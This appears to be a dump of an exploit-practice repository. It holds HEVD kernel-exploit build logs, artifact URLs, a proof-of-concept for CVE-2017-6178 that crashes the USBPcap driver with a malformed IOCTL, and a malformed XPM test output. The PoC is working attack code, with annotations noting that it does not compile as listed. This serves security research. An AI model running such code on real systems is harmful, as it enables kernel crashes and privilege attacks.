20 | HEVD_Stop_By_Win10.c(652): warning C4244: '+=' : conversion from 'double' to '__int64', possible loss of data
21 | HEVD_Stop_By_Win10.c(656): warning C4244: '+=' : conversion from 'double' to '__int64', possible loss of data
22 | HEVD_Stop_By_Win10.c(671): warning C4133: 'function' : incompatible types - from 'SIZE_T *' to 'PULONG'
23 | Link:
24 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\x86_amd64\link.exe /ERRORREPORT:PROMPT /OUT:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.exe" /INCREMENTAL:NO /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"x64\Release\Stop_by_win10.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.pdb" /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.lib" /MACHINE:X64 _debugbreak.obj
25 | x64\Release\HEVD_Stop_By_Win10.obj
26 | Generating code
27 | Finished generating code
28 | Stop_by_win10.vcxproj -> C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.exe
29 | Manifest:
30 | C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\mt.exe /nologo /verbose /outputresource:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\x64\Release\Stop_by_win10.exe;#1" /manifest x64\Release\Stop_by_win10.exe.intermediate.manifest
31 | FinalizeBuildStatus:
32 | Deleting file "x64\Release\Stop_by_win10.unsuccessfulbuild".
33 | Touching "x64\Release\Stop_by_win10.lastbuildstate".
34 | Done Building Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\Stop_by_win10.vcxproj" (rebuild target(s)).
35 |
36 | Build succeeded.
37 |
38 | Time Elapsed 00:00:00.56
39 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/custombuild.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/mt.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/vc100.pdb
--------------------------------------------------------------------------------
/_cve_2017_6178_poc/_CVE_2017_6178_PoC.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/*
 * Proof-of-concept for the issue named by the file path (CVE-2017-6178):
 * opens the USBPcap control device "\\.\USBPcap1" and issues IOCTL
 * 0x00090000 with an input buffer pointer of 0x1 and a length of 0.
 *
 * NOTE(review): as listed, this does not compile -- the two #include
 * directives above have lost their header names (presumably windows.h and
 * stdio.h, lost in extraction) and bResult (line 15) is never declared.
 *
 * Defender's view: the pointer passed here is never a valid user buffer, so a
 * driver IOCTL handler that dereferences caller-supplied input without
 * validating it (or without using a buffered transfer method, where the I/O
 * manager copies the data) would fault in kernel mode -- verify the exact
 * driver-side cause against the vendor advisory before relying on this reading.
 */
4 | int main(int argc, char *argv[])
5 | {
6 | HANDLE hDevice;
7 | DWORD dwRetBytes = 0;   /* bytes-returned out-parameter for DeviceIoControl */
8 | hDevice = CreateFile("\\\\.\\USBPcap1", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);   /* dwDesiredAccess = 0: opens the device without requesting read/write access */
9 |
10 | if (hDevice == INVALID_HANDLE_VALUE)
11 | {
12 | printf("[-] CreateFile failed (%.08x)\n", GetLastError());   /* error code as 8 hex digits */
13 | return -1;
14 | }
15 | bResult = DeviceIoControl(hDevice, 0x00090000,(LPVOID)0x1, (DWORD)0, NULL, 0, &dwRetBytes, NULL);   /* NOTE(review): bResult is undeclared in this listing; input buffer is the bogus pointer 0x1 with size 0 and no output buffer */
16 | if (!bResult)
17 | {
18 | printf("[-] DeviceIOControl failed (%.08x)\n",GetLastError());
19 | return 0;
20 | }
21 | printf("[+] if show this info ,PoC is failed:(\n\n");   /* reached only if the IOCTL returned normally, i.e. the driver handled the bad pointer */
22 | return 0;
23 | }
--------------------------------------------------------------------------------
/memory-leak_output_art_ReadOnePNGImage_output.picon:
--------------------------------------------------------------------------------
1 | /* XPM */
/*
 * NOTE(review): this looks like an ImageMagick picon (XPM-format) dump produced
 * as memory-leak test output for ReadOnePNGImage -- confirm against the
 * generating tool. Treat it as a generated artifact, not hand-written source:
 * the array name below contains '-' characters and is therefore not a valid C
 * identifier, and the pixel section is incomplete in this listing (rows 39 and
 * 43-49 are absent, and several rows are visibly not the 48 characters wide
 * that the header line "48 48 31 1" declares). The 31 colour entries do match
 * the header's colour count.
 */
2 | static char *memory-leak_output_art_ReadOnePNGImage_output[] = {
3 | /* columns rows colors chars-per-pixel */
4 | "48 48 31 1",
/* colour table: one entry per character, 31 entries (lines 5-35) */
5 | " c black",
6 | ". c DarkSlateGray",
7 | "X c #7E7E7E",
8 | "o c firebrick",
9 | "O c red",
10 | "+ c sienna",
11 | "@ c tomato",
12 | "# c green",
13 | "$ c LimeGreen",
14 | "% c SeaGreen",
15 | "& c orange",
16 | "* c peru",
17 | "= c gold",
18 | "- c yellow",
19 | "; c navy",
20 | ": c blue",
21 | "> c #800080",
22 | ", c magenta",
23 | "< c SlateGray",
24 | "1 c DodgerBlue",
25 | "2 c cyan",
26 | "3 c tan",
27 | "4 c PaleGreen",
28 | "5 c wheat",
29 | "6 c violet",
30 | "7 c SkyBlue",
31 | "8 c gainsboro",
32 | "9 c LemonChiffon",
33 | "0 c lavender",
34 | "q c white",
35 | "w c grey75",
36 | /* pixels */
/* pixel rows: one string per row, one character per pixel; rows are
 * numbered 37-84 in this listing but several are missing and widths vary */
37 | ";1<;1:<;1;<;1;;1;.:<<;1:<;<:.;1;:<;<:<:<:;<::<;<",
38 | ":.:.;<;1;<:<:<<:<:1;:<;<;1:<:1:.:<:<:<:.:.<;1;<1;.:<;1;qqq;<::<;<;<<:1;;1:<",
40 | ";1;<1<:.;1;<:<1;<;<:;<:<:<0qqqq1;1.;<:1;;.:<<:.;",
41 | ";<;1;.1;.1;;<;;1:<>1;<1;qqqqq:<;;<:1<;<:1;1;<:1.",
42 | "1:<;<::<:<<:::<;.:1;.:;1;<21:<;;<::<;<",
50 | "11711.;1<;1;711;;<<;2;.1<:<.71;11;.:2;<;<:;<<;1;",
51 | "2711;;<;:1;<2:;<;<:;71;<;1<:2;<:qqqqq;;11;1;<::<",
52 | "1117<::<<;<:2<<:1:.12;1:<;;171;1;<:<;1.;",
53 | "17711;<:;1:<;<;1><:.2<:<;1;<21;:<;1;71;1;;<:1;<1",
54 | "1121;1;<<;<;1:<;1;.;q;.:<;1;2>;<:<;12;<:<:;<7;:.",
55 | "2117<:<;:<;1;<:<:<100>1;:1;<2;1;1;<;72;<1;1;;1<;",
56 | "1171;<:;1;<:.:<;.:<;21;<<;<:2<:<;<:12<1;;<:<2<:<",
57 | "27111;2<;<:.;<:1:<.:2<1;<;:<<;1;2<;;<;:<2<1;:<;:",
58 | "1127;<<:1;<::<<;1;:<2;>1:1.;:<:<2<:<:1.;2:;<<;1.",
59 | "2117<:<2:<;11;<2;<;qq:.;;<;1;1;<7:;1;<;17;1::.1:",
60 | "1711;1;:.;1>;<:;<:1;2<:<<:<:<;<:2.1;<:<;2<;<<:;<",
61 | "1171<.1;2<;;1;.12#$---4-7;1;<;1;2<::%::1;<21;.:.",
62 | "21q111<;:<:<:<:<<:<1;21117711q@@O@O-4---4$=-44-4",
/* remaining rows are blank (all "black" pixels per the colour table) */
63 | " ",
64 | " ",
65 | " ",
66 | " ",
67 | " ",
68 | " ",
69 | " ",
70 | " ",
71 | " ",
72 | " ",
73 | " ",
74 | " ",
75 | " ",
76 | " ",
77 | " ",
78 | " ",
79 | " ",
80 | " ",
81 | " ",
82 | " ",
83 | " ",
84 | " "
85 | };
86 |
--------------------------------------------------------------------------------